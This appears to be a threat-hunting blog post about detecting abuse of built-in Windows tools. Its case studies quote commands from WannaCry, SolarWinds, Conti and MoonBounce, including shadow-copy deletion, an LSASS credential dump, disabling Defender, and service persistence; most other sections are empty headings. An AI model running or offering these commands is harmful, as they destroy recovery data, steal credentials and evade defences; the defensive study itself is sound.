Why Hunting For LOLBINs Is One Of The Best Bets

Living of the Land — Photo by no one cares on Unsplash

Introduction

You don’t drop things just because they’re old and dusty, you drop them only when they stop working

What do the Numbers Say

TOP 10 Techniques — Red Canary Threat Detection Report
https://trends.google.com/trends/explore?date=today%205-y&q=lolbins

Case Studies

Wannacry (2017)

icacls . /grant Everyone:F /T /C /Qattrib +h +s <Drive_Letter>:\$RECYCLEtaskkill.exe /f /im sqlserver.exetaskkill.exe /f /im sqlwriter.exetaskkill.exe /f /im mysqld.execmd.exe /c start /b @WanaDecryptor@.exe vsvssadmin delete shadows /all /quietwmic shadowcopy deletebcdedit /set {default} bootstatuspolicy ignoreallfailuresbcdedit /set {default} recoveryenabled nowbadmin delete catalog -qcscript.exe //nologo <1 character>.vbs

Solarwinds (2020)

wmic /node:[target] process call create “rundll32 c:\windows\[folder]\[beacon].dll [export]”Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\Windows\[folder]\[beacon].dll [export]’ -ComputerName [target]rundll32.exe c:\windows\[folder]\[beacon].dll [export]netsh advfirewall firewall add rule name=”[rulename1]” protocol=UDP dir=out localport=137 action=blockschtasks /query /v /s [target] /fo csvsc \\[target] query type=service state=allwmic /node:”[target]” service get name,startnamereg add HKLM\system\currentcontrolset\services\[service name] /v Start /t REG_DWORD /d 4″

Conti Leak (2021)

whoami /groupsnet localgroup administratorsnltest /dclist:[domain]rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump PID C:\ProgramData\lsass.dmp fullwmic /node: {1} process call create "rundll32.exe C:\ProgramData\2.dll StartW"wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd / c vssadmin list shadows >> c: \log.txt"powershell Set-MpPreference -DisableRealtimeMonitoring $truereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 / f

Moonbounce (2022)

net  start "iscsiwmi"sc  stop iscsiwmisc  delete iscsiwmireg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "iscsiwmi" /t REG_MULTI_SZ /d "iscsiwmi" /fsc  create "iscsiwmi" binPath= "$system32\svchost.exe -k iscsiwmi" type= share start= auto error= ignore DisplayName= "iscsiwmi"SC  failure "iscsiwmi" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc  description "iscsiwmi" ""iSCSI WMI Classes That Manage Initiators, Ports, Sessions and Connections""reg  add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /freg  add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "$windir\Microsoft.NET\Framework64\v4.0.30319\System.Mail.Service.dll" /fnet  start "iscsiwmi"

Hunting & Detecting LOLBINs Usage

Keeping Up With The Trends

Baseline and AppControl

Log, Collect and Detect

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.